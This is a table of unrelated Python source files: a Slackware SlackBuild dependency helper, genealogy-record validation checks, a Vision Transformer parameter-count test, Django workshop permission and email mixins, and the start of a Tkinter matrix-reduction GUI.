content stringlengths 5 1.05M |
|---|
#!/bin/env python3
# MIT License
# Copyright (c) 2019-2022 Andrew Payne
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# 79 spaces-------------------------------------------------------------------|
import glob
import os
import shutil
import stat
import subprocess
import sys
import time
# Software Data:
soft_name = "Slackstack"
soft_tag = "a slackbuild utility"
# Version
soft_vers = "0.10.6"
# set home directory
path = "~"
home = os.path.expanduser(path)
# lists and dictionaries
installed_dict = {}
sbo_categories = []
sbo_paths = {}
sbo_app_list = []
sbo_ver_list = []
sbo_av_dict = {}
deps_added_list = []
deps_checked_list = []
index_dict = {}
installseq_list = []
# This is where we set the path for personal repos, paths here get priority
# First priority
dir_dev = os.path.join(home, "slackware", "dev_slack", "")
# Second priority
dir_dbs = os.path.join(home, "slackware", "dbs_slackware", "")
# This is where the local slackbuilds git repo is stored
dir_sbo = os.path.join(home, "slackstack", "slackbuilds", "")
# This is the path where slackstack assembles the builds
dir_bld = os.path.join(home, "slackstack", "")
# This is the git repo to use for sbo
sbo_git = "https://gitlab.com/SlackBuilds.org/slackbuilds.git"
def hello_func():
os.system("clear")
welstr = ("Welcome to " \
+ soft_name \
+ " version "
+ soft_vers + ", " \
+ soft_tag + ".")
print("\n" + welstr)
print("")
def make_slackstack_dir_func():
subprocess.call(["mkdir", "-p", dir_sbo])
def dir_sbo_git_update_func():
print("Updating git")
if os.path.isdir(dir_sbo + ".git"):
subprocess.call(["git", "-C", dir_sbo, "pull"])
else:
subprocess.call(["git", "clone", sbo_git, dir_sbo])
time.sleep(1)
# build dictionary of local apps and libraries--------------------------------|
def build_dict_local_apps():
for item in os.listdir("/var/log/packages/"):
item = item.split(("-"))
itembuild = item[-1].strip()
if len(item[-1]) > 3:
itemversion = item[-3]+" ("+itembuild+")"
if len(item) == 7:
itemname = item[0]+"-"+item[1]+"-"+item[2]+"-"+item[3]
installed_dict.update({itemname:itemversion})
elif len(item) == 6:
itemname = item[0]+"-"+item[1]+"-"+item[2]
installed_dict.update({itemname:itemversion})
elif len(item) == 5:
itemname = item[0]+"-"+item[1]
installed_dict.update({itemname:itemversion})
else:
itemname = item[0]
installed_dict.update({itemname:itemversion})
# no tag means it's in the base system
else:
itemversion = item[-3]
if len(item) == 7:
itemname = item[0]+"-"+item[1]+"-"+item[2]+"-"+item[3]
installed_dict.update({itemname:itemversion})
elif len(item) == 6:
itemname = item[0]+"-"+item[1]+"-"+item[2]
installed_dict.update({itemname:itemversion})
elif len(item) == 5:
itemname = item[0]+"-"+item[1]
installed_dict.update({itemname:itemversion})
else:
itemname = item[0]
installed_dict.update({itemname:itemversion})
for item in os.listdir("/usr/bin/"):
if not installed_dict.get(str(item)):
installed_dict.update({item:"(version_unkown)"})
# checking installed libraries may be overkill for most purposes
# comment out if not needed
for item in os.listdir("/usr/lib64"):
if item[0:3] == "lib":
itemname = item[3:].split(".")
itemname = itemname[0]
if not installed_dict.get(str(itemname)):
installed_dict.update({itemname:"(system library)"})
else:
if not installed_dict.get(str(itemname)):
installed_dict.update({itemname:"(system library)"})
return installed_dict
# build dictionary of remote apps and libraries-------------------------------|
def build_dict_remote_apps():
sbo_av_dict = {}
for folder in glob.glob(dir_dev):
if os.path.isdir(folder) and folder not in sbo_categories:
sbo_categories.append(folder)
for folder in glob.glob(dir_dbs):
if os.path.isdir(folder) and folder not in sbo_categories:
sbo_categories.append(folder)
for folder in glob.glob(dir_sbo + "*"):
if os.path.isdir(folder) and folder not in sbo_categories:
sbo_categories.append(folder)
for folder in sbo_categories:
for path in os.listdir(folder):
if not sbo_paths.get(str(path)) \
and os.path.isdir(folder+"/"+path) \
and path != ".git":
# print(folder+"/"+path)
sbo_paths.update({path:folder})
for path, folder in sbo_paths.items():
with open(os.path.join(folder,path,path+".info"),"r") as f:
lines = f.readlines()
for line in lines:
if "PRGNAM=" in line:
prgnam = line.strip().split("=")
prgnam = str(prgnam[1]).replace('"','')
sbo_app_list.append(prgnam)
if "VERSION=" in line:
version = line.strip().split('=')
version = str(version[1]).replace('"','')
sbo_ver_list.append(version)
sbo_av_dict = dict(zip(sbo_app_list, sbo_ver_list))
return sbo_av_dict
def check_available_builds(app):
for a,v in build_dict_remote_apps().items():
# for a,v in sbo_av_dict.items():
if a == app:
print("Available version:",a,v)
found = 1
break
else:
found = 0
if found == 0:
print(app, "SlackBuild not found \n")
exit()
def check_installed_builds(app):
for a,v in build_dict_local_apps().items():
# for a,v in installed_dict.items():
if a == app:
print("Installed version:",a,v,"\n")
found = 1
break
else:
found = 0
if found == 0:
print("Installed version:", "NONE", "\n")
def clean_tree():
generic_path = (os.path.join(home,"slackstack"))
kill_path = glob.glob(os.path.join(generic_path, "*-tree", ""))
if kill_path:
shutil.rmtree(os.path.join(kill_path[0]))
def copy_slackbuild_dirs_to_tree(app):
remote_path = (os.path.join(sbo_paths[str(app)],app))
local_path = (os.path.join(home,"slackstack",app_0+"-tree"+"/",app+"/"))
print("Copying", app, "to", local_path, "\n")
shutil.copytree(remote_path,local_path)
def check_for_dependencies():
lines = []
local_path = (os.path.join(home,"slackstack",app_0+"-tree"+"/"))
for item in os.listdir(local_path):
if item not in deps_checked_list:
deps_checked_list.append(item)
with open(local_path+item+"/"+item+".info", "r") as f:
lines = f.readlines()
else:
continue
for line in lines:
if "REQUIRES" in line and len(line) > 12:
line = line.replace("REQUIRES=","").replace('"','').strip()
line = line.split(" ")
for dep in line:
deps_added_list.append(dep)
if dep not in index_dict.values():
counter = (len(deps_added_list))
print(counter)
index_dict.update({counter:dep})
check_available_builds(dep)
check_installed_builds(dep)
copy_slackbuild_dirs_to_tree(dep)
def iterate_for_permissions_func():
for item in glob.glob(dir_bld + "*tree/*/*"):
if "SlackBuild" in item:
perms = os.stat(item)
os.chmod(item, perms.st_mode | stat.S_IEXEC)
def create_install_list_func():
n = len(index_dict) + 1
y = 0
z = 0
for i in deps_added_list:
if len(i) > y:
y = len(i)
for i in deps_added_list:
if i in build_dict_local_apps().keys():
z = (y + 2) - len(i)
installseq_list.append(
str(n) + " "*2 + i + " "*z + build_dict_local_apps().get(i) \
+ "\t" + "INSTALLED" + "\n\n"
)
n-=1
installseq_list.append(
i + " " + build_dict_remote_apps().get(i)
+ " will replace:\n")
else:
z = (y + 2) - len(i)
installseq_list.append(\
str(n) \
+ " "*2 \
+ i \
+ " "*z \
+ "not installed"
+ "\n")
n-=1
file_loc = glob.glob(dir_bld + "*tree")
with open(os.path.join(file_loc[0], "installseq.txt"), "w") as f:
f.write("Install order:\n")
for i in reversed(installseq_list):
f.write(i)
f.close
# Let's get started
hello_func()
make_slackstack_dir_func()
dir_sbo_git_update_func()
hello_func()
build_dict_remote_apps()
build_dict_local_apps()
print("What app are we building?")
app_0 = input("---> ")
print("")
deps_added_list.append(app_0)
app = app_0
check_available_builds(app)
check_installed_builds(app)
clean_tree()
copy_slackbuild_dirs_to_tree(app)
print("\nDependencies:\n")
y = 1
for y in range (1, 10):
check_for_dependencies()
iterate_for_permissions_func()
if len(deps_added_list) == 1:
print("None!\n")
else:
pass
create_install_list_func()
grab_y_n = input("Run slackgrab.py to get the tarballs (y/n)? ")
if grab_y_n == "Y" or grab_y_n == "y":
subprocess.run(["slackgrab.py", "--skip"], cwd=sys.path[0])
else:
pass
exit()
|
# -*- coding: utf-8 -*-
class Shop(object):
def __init__(self, id, name, lat, lng, tags=None):
self.id = id
self.lng = lng
self.lat = lat
self.name = name
if tags is None:
tags = []
# tags should have relation to product not shop
# since the search is product-based
self.tags = tags
def add_tag(self, tag):
self.tags.append(tag)
|
import model
from datetime import datetime
import dateutil
from datetime import date
from unittest import TestCase
from dateutil.relativedelta import relativedelta
error_locations = []
def error_dealer(storyType,definition, location):
if isinstance(location, list):
# print("yes")
location = ','.join(location)
formatted = 'Error: "{}" {}.Index: {}' \
.format(storyType, definition, location)
print(formatted)
# US02 - Birth should occur before marriage of that individual
def birth_before_marriage(individuals, families):
return_status = True
error_type = "US02"
for family in families:
if family.marriage:
husband = None
wife = None
for indiv in individuals:
if indiv.uid == family.husband:
husband = indiv
if indiv.uid == family.wife:
wife = indiv
if husband.birthday and husband.birthday > family.marriage:
report_error(error_type, "Birth of husband occurs after marraige", [husband.uid])
return_status = False
if wife.birthday and wife.birthday > family.marriage:
report_error(error_type, "Birth of wife occurs after marriage", [wife.uid])
return_status = False
return return_status
#US03 - Birth should occur before death of an individual.
def birth_before_death(individuals):
return_status = True
for individual in individuals:
if individual.deathDate and individual.birthday:
if individual.deathDate < individual.birthday:
report_error("US03", "Birth occurs before death.",[individual.uid])
return_status = False
return return_status
#------User Story 5-----------------------------
def marriage_before_death(individuals, families):
allOk = True
story_number = "US05"
for family in families:
if family.marriage:
husband = None
wife = None
for indiv in individuals:
if indiv.uid == family.husband:
husband = indiv
if indiv.uid == family.wife:
wife = indiv
if wife.alive == False:
if family.marriage < wife.deathDate:
allOk = False
error_descrip = "Death of Wife occured before marriage"
error_location = [wife.uid]
error_dealer(story_number, error_descrip, error_location)
if husband.alive == False:
if husband.deathDate < family.marriage:
allOk = False
error_descrip = "Death of Husband occured before marriage"
error_location = [husband.uid]
error_dealer(story_number, error_descrip, error_location)
return allOk
#------User Story 8--------------------------
def birth_before_parents_marry(indi, families):
story_number = "US09"
allOk = True
for fam in families:
if fam.children:
None
for child in fam.children:
# print(child)
for person in indi:
if person.uid == child:
if fam.marriage:
if person.birthday < fam.marriage:
allOk = False
error_dealer(story_number, "A child is born before their parent's marriage", [fam.uid, person.uid])
if fam.divorce:
if person.birthday > date.today()+relativedelta(months=9):
allOk = False
error_dealer(story_number, "A child is after 9 months of their parents divorce",[fam.uid, person.uid])
#Diagnostic Code below
#print("Error in fam:"+fam.uid+". Child: "+ person.birthday.strftime('%m/%d/%Y')+" Parent's marriage: "+ fam.marriage.strftime('%m/%d/%Y'))
return allOk
# if fam.marriage > :
# (indi, families) = model.main()
# birth_before_parents_marry(indi, families)
#User Story 7
def less_than_150_years_old(individuals):
allOk = True
story_number = "US07"
for individual in individuals:
if individual.birthday is not None:
if individual.deathDate:
if individual.deathDate > individual.birthday + relativedelta(years=150):
allOk = False
error_descrip = "Individual was older than 150 years old"
error_location = [individual.uid]
error_dealer(story_number, error_descrip, error_location)
# print(individual.name,(date.today() - individual.birthday).days / 365)
elif ((date.today() - individual.birthday).days / 365) >= 150:
allOk = False
error_descrip = "Individual is older than 150 years old"
error_location = [individual.uid]
error_dealer(story_number, error_descrip, error_location)
return allOk
#User Story 10
def marriage_after_14(individuals, families):
story_number = "US10"
allOk = True
for family in families:
if family.marriage:
husband = None
wife = None
for indiv in individuals:
if indiv.uid == family.husband:
husband = indiv
if indiv.uid == family.wife:
wife = indiv
if 14 < (wife.birthday - family.marriage).days / 365:
allOk = False
error_descrip = "Wife married before age 14"
error_location = [wife.uid]
error_dealer(story_number, error_descrip, error_location)
if 14 < (husband.birthday - family.marriage).days / 365:
allOk = False
error_descrip = "Husband married before age 14"
error_location = [husband.uid]
error_dealer(story_number, error_descrip, error_location)
return allOk
################## Sprint 2 ##################
#------User Story 6-----------------------------
def divorce_before_death(individuals, families):
allOk = True
story_number = "US06"
for family in families:
if family.marriage and family.divorce:
husband = None
wife = None
for indiv in individuals:
if indiv.uid == family.husband:
husband = indiv
if indiv.uid == family.wife:
wife = indiv
if wife.alive == False:
if family.divorce > wife.deathDate:
allOk = False
error_descrip = "Divorce occurred after death of wife"
error_location = [wife.uid]
error_dealer(story_number, error_descrip, error_location)
if husband.alive == False:
if husband.deathDate < family.divorce:
allOk = False
error_descrip = "Divorce occurred after death of husband"
error_location = [husband.uid]
error_dealer(story_number, error_descrip, error_location)
return allOk
#------User Story 9--------------------------
def birth_before_parents_death(individuals, families):
story_number = "US09"
allOk = True
for fam in families:
husband = None
wife = None
for indiv in individuals:
if indiv.uid == fam.husband:
husband = indiv
if indiv.uid == fam.wife:
wife = indiv
# husband.deathDate.month = husband.deathDate.month + 9
if husband.deathDate:
# print("old")
# print(husband.deathDate)
orgDate = husband.deathDate.strftime("%Y-%m-%d")
date_format = '%Y-%m-%d'
dtObj = datetime.strptime(orgDate, date_format)
n = 9
future_date = dtObj + relativedelta(months=n)
future_date = future_date.date()
# print("new")
# print(future_date)
if fam.children:
for child in fam.children:
for person in individuals:
if person.uid == child:
# print("pdare")
# print(person.birthday)
if fam.marriage and wife.deathDate and husband.deathDate:
if person.birthday > wife.deathDate:
allOk = False
error_dealer(story_number, "A child is born after mother's death", [fam.uid, person.uid])
if person.birthday > future_date:
allOk = False
error_dealer(story_number, "A child is born after father's death", [fam.uid, person.uid])
return allOk
#US01 - Dates Before Current Date
def dateBeforeToday(individuals,families):
allOk = True
story_number = "US01"
# print(date.today())
for indi in individuals:
if indi.birthday is not None:
if indi.birthday > date.today():
allOk = False
error_descrip = "Birthdate in future"
error_location = [indi.uid]
error_dealer(story_number, error_descrip, error_location)
if indi.deathDate is not None:
if indi.deathDate > date.today():
allOk = False
error_descrip = "Deathdate in future"
error_location = [indi.uid]
error_dealer(story_number, error_descrip, error_location)
for fam in families:
if fam.marriage is not None:
if fam.marriage > date.today():
allOk = False
error_descrip = "Marriage Date in future"
error_location = [fam.uid]
error_dealer(story_number, error_descrip, error_location)
if fam.divorce is not None:
if fam.divorce > date.today():
allOk = False
error_descrip = "Divorce date in future"
error_location = [fam.uid]
error_dealer(story_number, error_descrip, error_location)
return allOk
#US04 - Marriage before Divorce
def marriageBeforeDivorce(individuals, families):
allOk = True
story_number = "US04"
for fam in families:
if fam.marriage is not None:
if fam.divorce is not None:
if fam.divorce < fam.marriage:
allOk = False
error_descrip = "Divorced before marriage"
error_location = [fam.uid]
error_dealer(story_number, error_descrip, error_location)
return allOk
# report Error to the console
def report_error(error_type, description, locations):
# report("ERROR", error_type, description, locations)
if isinstance(locations, list):
locations = ','.join(locations)
estr = '{:14.14s} {:50.50s} {:10.10s}' \
.format(error_type, description, locations)
print(estr)
error_locations.extend(locations)
error_locations.extend(locations)
#User Story 17
def no_marriages_to_descendants(individuals, families):
allOk = True
story_number = "US17"
childOf = None
spouseOf = None
for individual in individuals:
if individual.famc:
childOf = individual.famc
if individual.fams:
spouseOf = individual.fams
for fam in families:
if fam in childOf:
if fam.husband in spouseOf:
allOk = False
error_descrip = "Husband married descendants"
error_location = [fam.husband.uid]
error_dealer(story_number, error_descrip, error_location)
if fam.wife in spouseOf:
allOk = False
error_descrip = "Wife married descendants"
error_location = [fam.wife.uid]
error_dealer(story_number, error_descrip, error_location)
return allOk
#User Story 18
def siblings_should_not_marry(individuals, families):
allOk = True
story_number = "US18"
for fam in families:
if fam.children:
None
for child in fam.children:
for person in individuals:
if person.uid == child:
if child.marriage:
if child.marriage == child.marriage:
allOk = False
error_dealer(story_number, "Child married a sibling",[fam.uid, person.uid])
return allOk
#User Story 21
def correct_gender_for_role(individuals, families):
allOk = True
story_number = "US21"
for family in families:
if family.marriage:
husband = None
wife = None
for indiv in individuals:
if indiv.uid == family.husband:
husband = indiv
if husband.sex == "F":
allOk = False
error_descrip = "Husband gender is not Male"
error_location = [husband.uid]
error_dealer(story_number, error_descrip, error_location)
if indiv.uid == family.wife:
wife = indiv
if wife.sex == "M":
allOk = False
error_descrip = "Wife gender is not Female"
error_location = [husband.uid]
error_dealer(story_number, error_descrip, error_location)
# for husband in family.husband:
# if husband.sex == "F":
# allOk = False
# error_descrip = "Husband gender is not Male"
# error_location = [husband.uid]
# error_dealer(story_number, error_descrip, error_location)
# for wife in family.husband:
# if wife.sex == "M":
# allOk = False
# error_descrip = "Wife gender is not Female"
# error_location = [husband.uid]
# error_dealer(story_number, error_descrip, error_location)
return allOk
#User Story 15
def fewer_than_15_siblings(individuals, families):
allOk = True
story_number = "US15"
for family in families:
if family.children:
count = 0
for i in family.children:
count = count + 1
if count >= 15:
allOk = False
error_dealer(story_number, "more than 15 siblings",[family.uid])
return allOk
#-----------------USER STORY 11------------
def no_bigamy(individuals,families):
allOk = True
story_number = "US11"
for fam in families:
if fam.marriage:
for indi in individuals:
if indi.uid == fam.husband:
husband = indi
elif indi.uid == fam.wife:
wife = indi
for fam2 in families:
if fam2.marriage is not None:
if fam.marriage < fam2.marriage:
if fam2.husband == husband.uid and not fam2.wife == wife.uid and ((fam.divorce is not None and fam2.marriage < fam.divorce) or (fam.divorce is None and (wife.deathDate is None or fam2.marriage < wife.deathDate))):
allOk = False
error_descrip = "Husband remarried before end of his other marriage"
error_location = [husband.uid]
error_dealer(story_number, error_descrip, error_location)
elif fam2.wife == wife.uid and not fam2.husband == husband.uid and ((fam.divorce is not None and fam2.marriage < fam.divorce) or (fam.divorce is None and (husband.deathDate is None or fam2.marriage < husband.deathDate))):
allOk = False
error_descrip = "Wife remarried before end of her other marriage"
error_location = [wife.uid]
error_dealer(story_number, error_descrip, error_location)
return allOk
#-----------------USER STORY 12-------------------
def parents_not_too_old(individuals,families):
allOk = True
story_number = "US12"
for fam in families:
for indi in individuals:
if indi.uid == fam.husband:
h_indi = indi
if indi.uid == fam.wife:
w_indi = indi
for indi1 in individuals:
if indi1.uid in fam.children:
if h_indi.birthday is not None and indi1.birthday > h_indi.birthday + relativedelta(years=80):
allOk = False
error_descrip = "Child born after 80 years of father's age"
error_location = [indi1.uid]
error_dealer(story_number, error_descrip, error_location)
if w_indi.birthday is not None and indi1.birthday > w_indi.birthday + relativedelta(years=60):
allOk = False
error_descrip = "Child born after 60 years of mother's age"
error_location = [indi1.uid]
error_dealer(story_number, error_descrip, error_location)
return allOk
#US29 - List deceased
def list_deceased_name(individuals,families):
return_status = True
count = 0
print("****************List deceased******************")
for individual in individuals:
if individual.alive:
count = count + 1
print(individual.name)
if count == 0:
report_error("US29", "No death found.",[individual.uid])
return_status = True
return return_status
#US30 - List live married
def list_live_married_name(individuals,families):
return_status = True
count = 0
print("****************List live married******************")
for family in families:
if family.marriage:
for indi in individuals:
if indi.uid == family.husband and indi.alive:
husband = indi
print (indi.name)
count = count + 1
if indi.uid == family.wife and indi.alive:
wife = indi
print (indi.name)
count = count + 1
if count == 0:
report_error("US30", "No live married found.",[individuals.uid])
return_status = True
return return_status
#US21 - husband male and wife should be female
def correct_gender(individuals,families):
return_status = True
print("****************check correct gender******************")
for family in families:
sex = ""
for indi in individuals:
if indi.uid == family.husband:
if indi.sex != "M":
report_error("US21", "husband not male",[indi.uid])
return_status = False
return return_status
if indi.uid == family.wife:
if indi.sex != "F":
report_error("US21", "wife not female.",[indi.uid])
return_status = False
return return_status
return return_status
#US27 - List deceased
def list_indi_age(individuals,families):
return_status = True
count = 0
print("****************list_indi_age******************")
for individual in individuals:
if individual.birthday:
orgDate = individual.birthday.strftime("%Y-%m-%d")
date_format = '%Y-%m-%d'
dtObj = datetime.strptime(orgDate, date_format)
now = datetime.utcnow()
now = now.date()
age = dateutil.relativedelta.relativedelta(now, dtObj)
age = age.years
print(individual.name)
print(age)
count = count + 1
if count == 0:
report_error("US27", "No individual found found.",[individual.uid])
return_status = False
return return_status
#User Story 31
def list_live_single_name(individuals,families):
return_status = True
count = 0
print("Living single over 30 never married")
for family in families:
for individual in individuals:
if individual.birthday:
orgDate = individual.birthday.strftime("%Y-%m-%d")
date_format = '%Y-%m-%d'
dtObj = datetime.strptime(orgDate, date_format)
now = datetime.utcnow()
now = now.date()
age = dateutil.relativedelta.relativedelta(now, dtObj)
age = age.years
if 30 < age:
if individual.uid == family.husband or individual.uid == family.wife:
count = count + 1
else:
print(individual.name)
if count == 0:
report_error("US30", "no single living people over the age of 30 that have never been married.", [individual.uid])
return_status = True
return return_status
#User Story 35
def list_recent_births(individuals):
# allOk = True
# story_number = "US35"
list = []
for indi in individuals:
if indi.birthday:
if indi.birthday + relativedelta(days=30) >= date.today():
list.append(indi.name)
return list
#User Story 36
def list_recent_deaths(individuals):
# allOk = True
# story_number = "US35"
list = []
for indi in individuals:
if indi.deathDate:
if indi.deathDate + relativedelta(days=30) >= date.today():
list.append(indi.name)
return list
#User Story 38
def list_upcoming_birthdays(individuals):
# allOk = True
# story_number = "US38"
list = []
for indi in individuals:
if indi.birthday:
if indi.birthday + relativedelta(days=30) <= date.today():
list.append(indi.name)
return list
(individuals, families) = model.main()
print(list_recent_deaths(individuals)) |
# Copyright 2021 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from absl.testing import absltest
from absl.testing import parameterized
import jax
import jax.numpy as jnp
from vit_jax import models
from vit_jax.configs import models as config_lib
MODEL_SIZES = {
'ViT-B_16': 86_567_656,
'R50+ViT-B_16': 98_659_112,
'ViT-B_32': 88_224_232,
'R26+ViT-B_32': 101_383_976,
'ViT-L_16': 304_326_632,
'ViT-L_32': 306_535_400,
'R50+ViT-L_32': 328_994_856,
'ViT-H_14': 632_045_800,
'Mixer-B_16': 59_880_472,
'Mixer-L_16': 208_196_168,
}
class ModelsTest(parameterized.TestCase):
@parameterized.parameters(*list(MODEL_SIZES.items()))
def test_can_instantiate(self, name, size):
rng = jax.random.PRNGKey(0)
config = config_lib.MODEL_CONFIGS[name]
model_cls = models.VisionTransformer if 'ViT' in name else models.MlpMixer
model = model_cls(num_classes=1_000, **config)
inputs = jnp.ones([2, 224, 224, 3], jnp.float32)
variables = model.init(rng, inputs, train=False)
outputs = model.apply(variables, inputs, train=False)
self.assertEqual((2, 1000), outputs.shape)
param_count = sum(p.size for p in jax.tree_flatten(variables)[0])
self.assertEqual(
size, param_count,
f'Expected {name} to have {size} params, found {param_count}.')
if __name__ == '__main__':
absltest.main()
|
import sqlite3
CONN_STRING = '/media/sf_VBox_Shared/CaseLaw/caselaw.db'
def get_connection():
conn = sqlite3.connect(CONN_STRING)
return conn |
from django.contrib import messages
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.http import Http404
from django.http import HttpResponseForbidden
from django.http import HttpResponseRedirect, JsonResponse
from wye.base.constants import WorkshopStatus, FeedbackType
from wye.base.emailer import send_mail
from wye.organisations.models import Organisation
from wye.profiles.models import Profile
from wye.regions.models import RegionalLead
from .models import Workshop, WorkshopFeedBack
class WorkshopAccessMixin(object):
def dispatch(self, request, *args, **kwargs):
user = request.user
pk = self.kwargs.get(self.pk_url_kwarg, None)
workshop = Workshop.objects.get(id=pk)
is_admin = Profile.is_admin(user)
is_lead = (Profile.is_regional_lead(user) and
RegionalLead.is_regional_lead(user, workshop.location))
is_organiser = (Profile.is_organiser(user) and
user in workshop.requester.user.all())
if not (is_admin or is_lead or is_organiser):
return HttpResponseForbidden("Not sufficent permission")
return super(WorkshopAccessMixin, self).dispatch(request, *args, **kwargs)
class WorkshopFeedBackMixin(object):
"""
Restrict access to feedback url if
- Workshop is not completed
- If the user accessing the url is not presenter or
organiser
"""
def dispatch(self, request, *args, **kwargs):
pk = self.kwargs.get('pk')
workshop = Workshop.objects.get(id=pk)
user = self.request.user
if workshop.status != WorkshopStatus.COMPLETED:
raise Http404
if not (workshop.is_presenter(user) or workshop.is_organiser(user)):
raise PermissionDenied
return super(WorkshopFeedBackMixin, self).dispatch(request, *args, **kwargs)
class WorkshopRestrictMixin(object):
"""
Mixin to restrict
- For organisation to add workshop if no feedback is shared.
- For presenter to takeup workshop if no feedback is shared
"""
allow_presenter = False
def dispatch(self, request, *args, **kwargs):
self.user = request.user
self.feedback_required = []
# check if user is tutor
if Profile.is_presenter(self.user) and self.allow_presenter:
self.validate_presenter_feedback()
elif (Profile.is_organiser(self.user) and
Organisation.list_user_organisations(self.user).exists()):
# if user is from organisation
self.validate_organisation_feedback()
elif (Profile.is_regional_lead(self.user) or
Profile.is_admin(self.user)):
pass # don't restrict lead and admin
else:
raise PermissionDenied
if self.feedback_required:
return self.return_response(request)
return super(WorkshopRestrictMixin, self).dispatch(request, *args, **kwargs)
def validate_presenter_feedback(self):
workshops = Workshop.objects.filter(
presenter=self.user, status=WorkshopStatus.COMPLETED)
for workshop in workshops:
feedback = WorkshopFeedBack.objects.filter(
workshop=workshop, feedback_type=FeedbackType.PRESENTER
).count()
if feedback == 0:
self.feedback_required.append(workshop)
def validate_organisation_feedback(self):
workshops = Workshop.objects.filter(
requester__user=self.user, status=WorkshopStatus.COMPLETED)
for workshop in workshops:
feedback = WorkshopFeedBack.objects.filter(
workshop=workshop, feedback_type=FeedbackType.ORGANISATION
).count()
if feedback == 0:
self.feedback_required.append(workshop)
def return_response(self, request):
msg = "Please complete the feeback for %s" % (
", ".join(map(str, self.feedback_required)))
# return json for ajax request
if request.is_ajax():
return JsonResponse({"status": False, "msg": msg})
messages.error(request, msg)
return HttpResponseRedirect(reverse('workshops:workshop_list'))
class WorkshopEmailMixin(object):
def send_mail_to_presenter(self, user, context):
"""
Send email to presenter.
@param user: Is user object
@param context: Is dict of data required by email template.
"""
# Send email to presenter
return send_mail([user.email], context, self.email_dir)
def send_mail_to_group(self, context, exclude_emails=None):
"""
Send email to org/group users.
@param context: Is dict of data required by email template.
@exclude_emails: Is list of email to be excluded from
email update.
"""
if exclude_emails is None:
exclude_emails = []
# Collage POC and admin email
poc_admin_user = Profile.get_user_with_type(
user_type=['Collage POC', 'admin']
).values_list('email', flat=True)
# Org user email
org_user_emails = self.object.requester.user.filter(
is_active=True
).values_list('email', flat=True)
# all presenter if any
all_presenter_email = self.object.presenter.values_list(
'email', flat=True
)
# List of tutor who have shown interest in that location
region_interested_member = Profile.objects.filter(
interested_locations=self.object.requester.location,
usertype__slug='tutor'
).values_list('user__email', flat=True)
all_email = []
all_email.extend(org_user_emails)
all_email.extend(all_presenter_email)
all_email.extend(poc_admin_user)
all_email.extend(region_interested_member)
all_email = set(all_email)
all_email = list(all_email.difference(exclude_emails))
send_mail(all_email, context, self.email_dir)
|
"""
Este modulo contiene el codigo para la construccion de la GUI
"""
from tkinter import *
from tkinter import ttk
from tkinter import messagebox
import numpy as np
import sympy as sy
class GUI():
def __init__(self):
pass
def Interfaz(self):
#Crear la interfaz grafica de usuario
self.Window.title("App Matrices")
self.Window.geometry("400x325+100+100")
self.Window.resizable(0,0)
self.Window.config(bg='#d4dce3')
BarraMenu=Menu(self.Window) #Menu para que el usuario establesca ejecucion de matrices o sistema de ecuaciones
self.Window.config(menu=BarraMenu)
self.Archivo=Menu(BarraMenu,tearoff=0)
self.Archivo.add_radiobutton(label="Matriz ",variable=self.VarMatriz,value=1,command=self.InterfazMatriz)
self.Archivo.add_radiobutton(label="Sistema de ecuaciones ",variable=self.VarMatriz,value=2,command=self.InterfazMatriz)
Ayuda=Menu(BarraMenu,tearoff=0)
Ayuda.add_command(label="Ver la ayuda ",command=self.TopAyuda)
BarraMenu.add_cascade(label='Archivo', menu=self.Archivo)
BarraMenu.add_cascade(label='Ayuda', menu=Ayuda)
self.Texto1=Label(self.Window,bg='#d4dce3',font=(10))
self.Texto2=Label(self.Window,bg='#d4dce3',font=(10))
ttk.Combobox(self.Window,values=['2','3','4','5'],textvariable=self.NFilas,width=1,state='readonly',font=(10)).place(x=115,y=15)
ttk.Combobox(self.Window,values=['2','3','4','5'],textvariable=self.NColumnas,width=1,state='readonly',font=(10)).place(x=270,y=15)
self.NFilas.set("2")
self.NColumnas.set("2")
Button(self.Window,text="Generar Cuadro",font=(10),bg='#5c8cc5',fg='white',bd=0,width=39,command=self.MoS).place(x=20,y=50)
self.FrameMatriz=Frame(self.Window,bg='#d4dce3')
self.FrameVariables=Frame(self.Window,bg='#d4dce3')
ttk.Entry(self.FrameMatriz,textvariable=self.A11,width=5,justify='right',font=(10)).grid(row=1,column=1)
ttk.Entry(self.FrameMatriz,textvariable=self.A12,width=5,justify='right',font=(10)).grid(row=1,column=2)
ttk.Entry(self.FrameMatriz,textvariable=self.A21,width=5,justify='right',font=(10)).grid(row=2,column=1)
ttk.Entry(self.FrameMatriz,textvariable=self.A22,width=5,justify='right',font=(10)).grid(row=2,column=2)
self.MTS=ttk.Button(self.Window,text="Matriz Escalonada",width=58,command=lambda: self.Reducir('T'))
self.MER=ttk.Button(self.Window,text="Matriz Escalonada Reducida",width=58,command=lambda: self.Reducir('R'))
self.SGJ=ttk.Button(self.Window,text="Solucion por el Metodo de Gauss-Jordan",width=58,command=lambda: self.Reducir('G'))
self.Archivo.invoke(index=0) #Iniciar con la interfaz grafica de matrices
Label(self.Window,text='By: Freddy',bg='#d4dce3').place(x=317,y=300)
def TopAyuda(self):
Top=Toplevel()
texto="\n\tCualquier consulta sobre el proyecto:\t\t\n\ngmail: 160892@unsaac.edu.pe\n"
Label(Top,text=texto).pack()
def InterfazMatriz(self):
